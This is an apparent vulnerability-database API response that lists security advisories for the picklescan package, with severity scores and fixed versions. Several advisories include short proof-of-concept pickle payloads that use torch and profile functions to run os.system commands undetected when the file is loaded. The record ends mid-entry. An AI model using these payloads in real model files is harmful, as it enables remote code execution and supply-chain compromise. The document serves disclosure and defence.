Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/87019?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/87019?format=api", "purl": "pkg:pypi/picklescan@0.0.5", "type": "pypi", "namespace": "", "name": "picklescan", "version": "0.0.5", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.0.4", "latest_non_vulnerable_version": "1.0.4", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/97455?format=api", "vulnerability_id": "VCID-1cce-4mst-r7h4", "summary": "The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-46417", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00332", "scoring_system": "epss", "scoring_elements": "0.56581", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00332", "scoring_system": "epss", "scoring_elements": "0.56585", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00332", "scoring_system": "epss", "scoring_elements": "0.56596", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00332", "scoring_system": "epss", "scoring_elements": "0.56463", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-46417" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-93mv-x874-956g", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-93mv-x874-956g" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-34.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-34.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/40", "reference_id": "40", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-24T14:50:58Z/" } ], "url": "https://github.com/mmaitre314/picklescan/pull/40" }, { "reference_url": "https://github.com/advisories/GHSA-93mv-x874-956g", "reference_id": "GHSA-93mv-x874-956g", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-24T14:50:58Z/" } ], "url": "https://github.com/advisories/GHSA-93mv-x874-956g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87471?format=api", "purl": "pkg:pypi/picklescan@0.0.25", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.25" } ], "aliases": [ "CVE-2025-46417", "GHSA-93mv-x874-956g", "PYSEC-2025-34" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1cce-4mst-r7h4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360641?format=api", "vulnerability_id": "VCID-1cft-ke16-8kac", "summary": "Picklescan missing detection when calling pytorch function torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression\n### Summary\n\nUsing torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport types\nimport torch.fx.experimental.symbolic_shapes as symbolic_shapes\n\nclass EvilTorchFxSymbolicShapesEvaluateGuardsExpression:\n def __reduce__(self):\n fake_self = str\n code = \"__import__('os').system('whoami')\"\n args = []\n return symbolic_shapes.ShapeEnv.evaluate_guards_expression, (fake_self, code, args)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/47" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f4x7-rfwp-v3xw", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f4x7-rfwp-v3xw" }, { "reference_url": "https://github.com/advisories/GHSA-f4x7-rfwp-v3xw", "reference_id": "GHSA-f4x7-rfwp-v3xw", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f4x7-rfwp-v3xw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89080?format=api", "purl": "pkg:pypi/picklescan@0.0.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.28" } ], "aliases": [ "GHSA-f4x7-rfwp-v3xw" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1cft-ke16-8kac" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360653?format=api", "vulnerability_id": "VCID-357d-3wwy-aubk", "summary": "Picklescan has a missing detection when calling built-in python profile.Profile.run\n### Summary\n\nUsing profile.Profile.run, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to profile.Profile.run function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilProfileRun:\n def __reduce__(self):\n from profile import Profile\n payload = \"__import__('os').system('whoami')\"\n return Profile.run, (Profile(), payload)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-x696-vm39-cp64", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-x696-vm39-cp64" }, { "reference_url": "https://github.com/advisories/GHSA-x696-vm39-cp64", "reference_id": "GHSA-x696-vm39-cp64", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x696-vm39-cp64" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-x696-vm39-cp64" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-357d-3wwy-aubk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212457?format=api", "vulnerability_id": "VCID-38pp-fqgk-bygf", "summary": "Picklescan is vulnerable to RCE through missing detection when calling numpy.f2py.crackfortran.myeval", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/advisories/GHSA-3329-ghmp-jmv5", "reference_id": "GHSA-3329-ghmp-jmv5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3329-ghmp-jmv5" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-3329-ghmp-jmv5", "reference_id": "GHSA-3329-ghmp-jmv5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-3329-ghmp-jmv5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-3329-ghmp-jmv5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-38pp-fqgk-bygf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360657?format=api", "vulnerability_id": "VCID-3ykn-199q-u3hf", "summary": "Picklescan missing detection when calling pytorch function torch.jit.unsupported_tensor_ops.execWrapper\n### Summary\n\nUsing torch.jit.unsupported_tensor_ops.execWrapper function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch.jit.unsupported_tensor_ops.execWrapper function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\n\nimport torch.jit.unsupported_tensor_ops as unsupported_tensor_ops\n\nclass EvilTorchJitUnsupportedTensorOpsExecWrapper:\n def __reduce__(self):\n code = '__import__(\"os\").system(\"whoami\")'\n glob = {}\n loc = {}\n return unsupported_tensor_ops.execWrapper, (code, glob, loc)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/47" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vr7h-p6mm-wpmh", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vr7h-p6mm-wpmh" }, { "reference_url": "https://github.com/advisories/GHSA-vr7h-p6mm-wpmh", "reference_id": "GHSA-vr7h-p6mm-wpmh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vr7h-p6mm-wpmh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89080?format=api", "purl": "pkg:pypi/picklescan@0.0.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.28" } ], "aliases": [ "GHSA-vr7h-p6mm-wpmh" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3ykn-199q-u3hf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212456?format=api", "vulnerability_id": "VCID-46rw-3mfv-67ad", "summary": "Picklescan is vulnerable to RCE through missing detection when calling built-in python operator.methodcaller", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": 